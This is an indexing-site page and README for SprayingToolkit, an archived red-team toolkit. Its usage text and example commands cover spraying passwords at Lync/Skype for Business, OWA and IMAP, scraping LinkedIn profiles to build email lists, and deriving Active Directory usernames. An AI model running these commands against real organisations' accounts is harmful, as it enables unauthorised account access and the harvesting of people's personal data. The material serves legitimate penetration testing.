Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/byt3bl33d3r/SprayingToolkit
Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
lync o365 owa password-spraying password-spraying-attacks pentesting python3 red-teams security security-tools skype-for-business
Last synced: 24 days ago
- Host: GitHub
- URL: https://github.com/byt3bl33d3r/SprayingToolkit
- Owner: byt3bl33d3r
- License: gpl-3.0
- Archived: true
- Created: 2018-09-13T09:52:11.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2022-10-17T01:01:57.000Z (about 2 years ago)
- Last Synced: 2024-09-27T03:41:12.250Z (3 months ago)
- Topics: lync, o365, owa, password-spraying, password-spraying-attacks, pentesting, python3, red-teams, security, security-tools, skype-for-business
- Language: Python
- Homepage:
- Size: 115 KB
- Stars: 1,445
- Watchers: 34
- Forks: 265
- Open Issues: 22
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient (Python)
README
# Deprecation Notice
This project is no longer maintained. The following alternative projects are better and actively maintained:
- [TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)
- [CredMaster](https://github.com/knavesec/CredMaster)

# SprayingToolkit
## Description
A set of Python scripts/utilities that *tries* to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.
## Sponsors
- <https://www.blackhillsinfosec.com/>
- <https://volkis.com.au>
- <https://qomplx.com/blog/cyber/>
- <https://ledgerops.com>
- <https://www.guidepointsecurity.com/>
- <https://lostrabbitlabs.com/>

## Official Discord Channel
Come hang out on Discord!
[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/khRyjTg)
## Installation
Install the pre-requisites with `pip3` as follows:
```bash
sudo -H pip3 install -r requirements.txt
```

Or use a Python virtual environment if you don't want to install the packages globally.
## Tool Overview
### Atomizer
A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7
#### Usage
```
Usage:
    atomizer (lync|owa|imap) [--targetPort PORT] [--threads THREADS] [--debug]
    atomizer (lync|owa|imap) --interval

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help               show this screen
    -v, --version            show version
    -c, --csvfile CSVFILE    csv file containing usernames and passwords
    -i, --interval TIME      spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS    number of concurrent threads to use [default: 3]
    -d, --debug              enable debug output
    -p, --targetPort PORT    target port of the IMAP server (IMAP only) [default: 993]
    --recon                  only collect info, don't password spray
    --gchat URL              gchat webhook url for notification
    --slack URL              slack webhook url for notification
    --user-row-name NAME     username row title in CSV file [default: Email Address]
    --pass-row-name NAME     password row title in CSV file [default: Password]
    --user-as-pass USERFILE  use the usernames in the specified file as the password (one per line)
```

#### Examples
```bash
./atomizer.py owa contoso.com 'Fall2018' emails.txt
```

```bash
./atomizer.py lync contoso.com 'Fall2018' emails.txt
```

```bash
./atomizer lync contoso.com --csvfile accounts.csv
```

```bash
./atomizer lync contoso.com --user-as-pass usernames.txt
```

```bash
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
```

```bash
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat
```

### Vaporizer
A port of [@OrOneEqualsOne](https://twitter.com/OrOneEqualsOne)'s [GatherContacts](https://github.com/clr2of8/GatherContacts) Burp extension to [mitmproxy](https://mitmproxy.org/) with some improvements.
Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performs password sprays in real-time.
(Built on top of Atomizer)
#### Examples
```bash
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target= --set password=password --set email_format='{f}.{last}'
```

By default, `email_format` is set to the `{first}.{last}` pattern; it is not a required argument.
The `domain` parameter is the domain to use for generating emails from names; the `target` parameter is the domain or URL to password spray.
Install the mitmproxy cert, set the proxy in your browser, go to Google and/or Bing and search (make sure to include the `/in`):
`site:linkedin.com/in "Target Company Name"`
Emails will be dumped to `emails.txt` in the specified format, and passed to Atomizer for spraying.
### Aerosol
Scrapes all text from the target website and sends it to [AWS Comprehend](https://aws.amazon.com/comprehend/) for analysis to generate custom wordlists for password spraying.
**Still a work in progress**
#### Usage
```bash
mitmdump -s aerosol.py --set domain=domain.com
```

### Spindrift
Converts names to Active Directory usernames (e.g. `Alice Eve` => `CONTOSO\aeve`).
#### Usage
```
Usage:
    spindrift [] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]
```

#### Examples
Reads names from STDIN, `--domain` is used to specify the domain manually:
```bash
cat names.txt | ./spindrift.py --domain CONTOSO
```

Reads names from `names.txt`, `--target` dynamically grabs the internal domain name from OWA (you can give it a domain or URL):
```bash
./spindrift.py names.txt --target contoso.com
```